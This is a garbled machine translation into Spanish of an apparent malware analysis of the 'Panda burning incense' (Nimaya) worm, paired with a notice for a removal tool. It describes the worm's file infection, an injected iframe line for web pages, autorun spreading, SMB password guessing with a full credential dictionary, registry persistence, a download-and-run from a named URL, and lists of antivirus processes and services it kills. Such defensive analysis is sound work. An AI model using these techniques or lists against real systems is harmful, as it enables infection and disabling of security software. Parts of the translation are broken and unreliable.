Con respecto al problema del virus del incienso quemado por los pandas, los expertos están aquí...
Nombre de la herramienta: Gusano. Herramienta de limpieza especial Nimaya (incienso panda).
Versión del software: 1.8
Tamaño del software: 332 KB
Plataforma de aplicación: Windows
Hora de actualización: 2007-01-24 p>
Fecha de publicación: 14-11-2006
Empresa editorial: Beijing Rising Technology Co., Ltd.
Dirección de descarga:
/zsgj/NimayaKiller. scr
Esta es una descarga muy impresionante escrita en Delphi.
El comportamiento principal del virus:
1. Comunicación
1. Infección del disco local
El virus elimina las letras del disco en el system Se realiza en todos los discos excepto A y B con los tipos de disco drive_remote y drive_fixed.
Nota sobre infección transversal de archivos: no infecte archivos de más de 1045760 bytes.
(El virus no infectará archivos en los siguientes directorios):
Microsoft Frontpage
Movie Maker
MSN Game Zone p>
Archivos públicos
sistema operativo Windows
Reutilizar
Información del volumen del sistema
Documentos y configuraciones
....
(El virus no infectará archivos con los siguientes nombres de archivo):
setup.exe
NTDETECT.COM< /p >
El virus utilizará dos métodos de infección para infectar nombres de archivos con diferentes sufijos.
1. Archivo ejecutable binario (sufijo: EXE, SCR, PIF, COM)
Disuelva el archivo de destino infectado y el virus en un solo archivo (el archivo infectado se adjunta al final de el archivo de virus) para completar la infección.
2. Clase de script (sufijo: htm, html, asp, php, jsp, aspx)
Agregue los siguientes enlaces al final de estos archivos de script (las siguientes páginas tienen seguridad agujeros):
& ltiframe src =/worm htm width = height = 0 & gt; & lt/iframe & gt; GHO se eliminará de estos discos.
2. Generar autorun.inf
El virus creará un temporizador y lo generará en el directorio raíz del disco con un período de 6 segundos.
Setup.exe (el virus en sí) autorun.inf y utilice la ejecución automática para abrir la asociación.
De esta forma, cuando el usuario haga clic en el disco infectado, el virus se ejecutará automáticamente.
3. Comunicación LAN
Los virus se generan aleatoriamente y varios hilos de propagación LAN implementan los siguientes métodos de propagación:
Cuando se descubre el virus, puede ser eliminado. conectado con éxito Al atacar el puerto 139 o 445 del objetivo, se utilizará la lista de usuarios integrada y el diccionario de contraseñas.
Haz conexiones. (Adivina la contraseña de la parte atacada) Cuando la conexión sea exitosa, cópiate y úsala para planificar tareas.
Activar el virus.
La cuenta para el intento de adivinar la contraseña es:
Admin
Invitado
Admin
Root
El diccionario utilizado para los intentos de contraseña es:
1234
Contraseña
6969
Harry
123456
Golf
Gato
Mustang
1111
Sombra
1313
Pescado
5150
7777
Teclado de mecanografía inglés estándar
Béisbol
2112
Lightmaine
Media
12345678
12345
Gestión
5201314
qq520
1234567
123456789
654321
54321
000000
11111111
88888888
Contraseña
Contraseña
Base de datos
Acelerar el sistema de recogida y entrega
abc123
Sybes
123qwe
Servidor de red informática
Ordenador
p>Excelente
123 a d
Ija Venopas
Dios te bendiga
Enable
2002
2003
2600
La primera letra del alfabeto griego
111111
121212
123123
1234qwer
123abc
Patrick
Gerente
Abogado
Root
Que te jodan
Joder
Prueba
Prueba 123
Empleado temporal
Temperatura 123
asdf
qwer
yxcv
zxcv
Inicio
Propietario
Iniciar sesión
Iniciar sesión
pw123
Amor
p>
mypc
mypc123
admin123
Mi pase
Mi pase 123
901100
2. la asociación de inicio del sistema operativo
El virus se copiará al directorio %SYSTEM32%\DRIVERS\ y el nombre del archivo será: spcolsv.exe.
Con un periodo de 1 segundo, establezca los siguientes valores clave de forma continua:
HKEY_Usuario actual\Software\Microsoft\Windows\Versión actual\Ejecutar
Svcshare=% Ruta del archivo de virus%
HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows
\Versión actual\Explorer\Advanced\Folder\Hide\Mostrar todo
CheckedValue=0
3. Comienza la descarga del archivo
El virus intentará leer la lista de archivos descargados en un sitio web específico cada 20 minutos.
Por ejemplo: http://wangma.9966.org/down.txt
Descargue los archivos especificados en la lista de archivos e inicie estos programas.
4. Frente al software antivirus
1. Cierre la ventana que contiene la siguiente cadena:
Firewall
Análisis de virus
p >
NOD32
Netdart
Desinfección
Duba
Software antivirus en ascenso
Super Rabbit
Maestro de optimización
Maestro
Trojan Sweeper
Trojan Sweeper
Kaspersky Anti-Virus
Symantec Antivirus
Duba
Respeta el Proceso
Green Eagle Computer
Antirrobo de Contraseñas
Phage
Visor auxiliar troyano
Monitor de seguridad del sistema
Blackie envuelto para regalo
Winsock Expert
Detección de caballo de Troya Master
Kit de herramientas antispyware
Ice Sword
2 Finalice el siguiente proceso:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logotipo1_. Extensión del programa ejecutable
Logo_1.exe
Rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe
3. Cierre y elimine los siguientes servicios:
Programación
Acceso compartido
RsCCenter
RsRavMon
RsCCenter
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McHill
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
p>NPFMntor
MskService
FireSvc
Nota:
Debido a que el virus infectará el sistema htm, html, asp, php, jsp , aspx y otros archivos, y agregarle algunos agujeros de seguridad.
Enlaces virales. Si el servidor está infectado, aumentará considerablemente la propagación del virus.